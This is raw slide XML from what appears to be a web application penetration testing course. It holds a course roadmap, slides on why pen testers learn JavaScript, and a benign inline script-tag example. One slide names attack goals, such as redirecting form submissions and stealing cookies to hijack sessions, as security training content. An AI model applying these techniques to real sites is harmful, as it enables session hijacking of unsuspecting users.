                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3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grpSp>
      </p:gr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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145413" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6573672"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Why JavaScript for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web App Pen Testers?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146435" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418148" y="1615440"/>
            <a:ext cx="8329612" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript is the most common client-side scripting language today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web app pen testers must therefore understand JavaScript for two reasons:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To read and understand scripts from target systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discover issues with the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determine how the application runs on the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To write our own attacks against target systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Changing the content of a page to redirect a form submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Steal cookies to hijack sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many, many other possibilities here</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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="167640"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147459" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1593911"/>
            <a:ext cx="7391400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Designed by Netscape in 1995</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Originally named LiveScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Name was changed to JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Despite the name, it is not directly related to Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Java and JavaScript are very different languages with very different interpreters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript is a dynamic language for client-side scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mainly used in websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But JavaScript is also used by other applications, such as Adobe Reader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147460" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-10000" contrast="10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5704493" y="532916"/>
            <a:ext cx="3376612" cy="220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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Use in Web Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148483" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1752600"/>
            <a:ext cx="6769700" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The focus in this course is web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript can be inline with HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As a script tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert("PEWAPT101 Rocks")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As part of an HTML item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
